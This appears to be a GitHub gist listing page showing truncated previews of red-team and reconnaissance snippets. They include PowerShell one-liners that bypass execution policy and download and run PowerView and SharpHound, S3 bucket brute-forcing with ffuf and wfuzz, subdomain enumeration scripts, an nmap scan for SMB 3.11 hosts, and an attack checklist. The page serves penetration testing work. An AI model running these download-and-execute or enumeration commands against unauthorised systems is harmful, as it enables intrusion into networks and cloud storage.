@secfb
secfb / RedTeam_CheatSheet.ps1
Created May 19, 2019 13:44 — forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@secfb
secfb / domaincheck.sh
Created September 12, 2019 09:44
domaincheck.sh
#!/bin/bash
# Usage: ./domaincheck.sh subdomainfile.txt outputfile.txt
echo -e "[+] Domaincheck.sh by @CMD\n"
if [ -z "$1" ] || [ -z "$2" ]; then
    echo "[!] Usage: ./domaincheck.sh [domain-list-file] [output-file]"
    exit 1
fi
echo "[+] Resolving domains to IPs..."
@secfb
secfb / allsubdomain.txt
Last active September 12, 2019 11:07
allsubdomain.txt
Ffuf (faster):
ffuf -u "https://s3.REGION.amazonaws.com/COMPANYDELIMITERENVIRONMENT" -w "aws-regions.txt:REGION" -w "company.txt:COMPANY" -w "delimiters.txt:DELIMITER" -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:ENVIRONMENT" -mc 200 -v
Wfuzz:
wfuzz -u "https://s3.FUZZ.amazonaws.com/FUZ2ZFUZ3ZFUZ4Z" -w aws-regions.txt -w company.txt -w delimiters.txt -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt" --sc 200 -v -t 50
The files:
@secfb
secfb / st8out.sh
Created February 18, 2020 22:11 — forked from dwisiswant0/st8out.sh
St8out - Extra one-liner for reconnaissance
#!/bin/bash
#####
#
# St8out - Extra one-liner for reconnaissance
#
# Usage: ./st8out.sh target.com
#
# Resources:
# - https://github.com/j3ssie/metabigor
@secfb
secfb / check-smb-v3.11.sh
Created March 11, 2020 17:21 — forked from nikallass/check-smb-v3.11.sh
CVE-2020-0796. Scan HOST/CIDR with nmap script smb-protocols.nse and grep SMB version 3.11.
#!/bin/bash
if [ $# -eq 0 ]
then
    echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR'
    exit 1
fi
echo "Checking if there's SMB v3.11 in $1 ..."
nmap -p445 --script smb-protocols -Pn -n "$1" | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | replace 'Nmap scan report for' '@' | tr "@" "\n" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP '\d+\.\d+\.\d+\.\d+'
@secfb
secfb / wahh_checklist.md
Last active May 31, 2020 09:40
wahh_checklist.md

Web Application attack checklist

Recon and analysis

  • Map visible content
  • Discover hidden & default content
  • Test for debug parameters
  • Identify data entry points
  • Identify the technologies used
  • Map the attack surface
@secfb
secfb / firefox.sh
Created March 21, 2020 10:09 — forked from payloadartist/firefox.sh
Enumerate sub-domains, then open them in Firefox automatically. Useful for taking a quick glance at a target's assets and making notes while doing recon.
# cat firefox.sh >> ~/.bashrc
# Usage - subf_ff target.tld
# asset_ff target.tld
subf_ff () {
    subfinder -d "$1" -silent -t 100 | httprobe -c 50 | sort -u | while read -r line; do firefox "$line"; sleep 10; done
}
asset_ff () {
    assetfinder -subs-only "$1" | httprobe -c 50 | sort -u | while read -r line; do firefox "$line"; sleep 10; done
}
@secfb
secfb / pasties.md
Created March 21, 2020 14:09
pasties.md
       __________  _____    ____________________.______________ _________
       \______   \/  _  \  /   _____/\__    ___/|   \_   _____//   _____/
        |     ___/  /_\  \ \_____  \   |    |   |   ||    __)_ \_____  \ 
        |    |  /    |    \/        \  |    |   |   ||        \/        \
        |____|  \____|__  /_______  /  |____|   |___/_______  /_______  /
                        \/        \/                        \/        \/ 

Pasties